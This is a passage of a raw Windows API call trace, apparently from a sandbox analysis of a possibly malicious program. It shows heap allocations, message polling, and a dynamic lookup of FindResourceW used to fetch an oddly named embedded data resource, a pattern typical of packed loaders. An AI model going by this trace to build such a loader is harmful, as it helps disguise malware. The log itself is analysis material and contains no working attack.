(HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe10 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13167a0 [0128.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe10 | out: hHeap=0x12c0000) returned 1 [0128.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0128.939] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0128.939] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efa40 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0128.939] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0128.939] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0128.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa40 | out: hHeap=0x12c0000) returned 1 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0128.940] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300388 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6668 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa40 [0128.940] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff00 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67a0 [0128.940] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6740 [0128.941] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.941] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001a8 [0128.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0128.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0128.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0128.941] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.941] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0128.941] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6668 | out: hHeap=0x12c0000) returned 1 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0128.942] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0128.942] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.942] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6608 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6578 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002c0 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300158 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6590 | out: hHeap=0x12c0000) returned 1 [0128.943] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.943] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.943] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0128.944] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0128.944] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316800 | out: hHeap=0x12c0000) returned 1 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0128.944] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.944] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e180 | out: hHeap=0x12c0000) returned 1 [0128.945] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13167a0 | out: hHeap=0x12c0000) returned 1 [0128.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efda0 | out: hHeap=0x12c0000) returned 1 [0128.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe10 | out: hHeap=0x12c0000) returned 1 [0128.945] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0128.945] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.945] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316880 | out: hHeap=0x12c0000) returned 1 [0128.945] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.946] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.947] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.947] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.947] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.947] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.947] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.948] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.949] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.950] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.950] CharLowerBuffW (in: lpsz="ptr", cchLength=0x3 | out: lpsz="ptr") returned 0x3 [0128.950] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x74650000 [0128.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0128.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0128.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.951] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xe) returned 0x14b67d0 [0128.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FindResourceW", cchWideChar=14, lpMultiByteStr=0x14b67d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FindResourceW", lpUsedDefaultChar=0x0) returned 14 [0128.951] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0128.952] GetProcAddress (hModule=0x74650000, lpProcName="FindResourceW") returned 0x74672a40 [0128.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0128.952] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0128.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0128.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0128.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0128.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe50 [0128.952] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20002) returned 0x14bffb0 [0128.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0128.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0128.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe50 | out: hHeap=0x12c0000) returned 1 [0128.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0128.955] FindResourceW (hModule=0x0, lpName="qhdokzqjbkdd", lpType=0xa) returned 0xfe76b8 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1314ca0 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69c8 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67e8 [0128.955] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe00 [0128.955] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67e8 | out: hHeap=0x12c0000) returned 1 [0128.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe00 | out: hHeap=0x12c0000) returned 1 [0128.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0128.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0128.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0128.956] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6938 [0128.956] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0128.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0128.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdc0 [0128.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0128.957] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fffc8 [0128.957] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bffb0 | out: hHeap=0x12c0000) returned 1 [0128.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6830 [0128.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6950 [0128.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b67d0 [0128.959] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efdf0 [0128.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b67d0 | out: hHeap=0x12c0000) returned 1 [0128.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdf0 | out: hHeap=0x12c0000) returned 1 [0128.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0128.959] FreeLibrary (hLibModule=0x74650000) returned 1 [0128.959] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efce0 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6878 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe70 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6860 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66f8 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6968 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69b0 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6998 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a28 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a88 | out: hHeap=0x12c0000) returned 1 [0128.960] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6908 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6aa0 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0128.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efdb0 [0128.961] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdb0 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69f8 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fffc8 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efdc0 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6848 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6938 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6830 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69c8 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1314ca0 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe60 | out: hHeap=0x12c0000) returned 1 [0128.961] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6740 | out: hHeap=0x12c0000) returned 1 [0128.961] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001f8 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66b0 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe40 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66e0 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe40 | out: hHeap=0x12c0000) returned 1 [0128.962] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b66f8 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66e0 | out: hHeap=0x12c0000) returned 1 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b66b0 | out: hHeap=0x12c0000) returned 1 [0128.962] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13001f8 | out: hHeap=0x12c0000) returned 1 